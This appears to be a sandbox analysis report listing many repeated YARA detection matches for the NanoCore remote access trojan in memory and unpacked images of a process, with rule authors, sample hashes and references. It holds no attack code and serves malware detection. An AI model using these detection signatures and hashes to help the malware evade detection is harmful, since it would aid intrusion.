Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.254bb40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
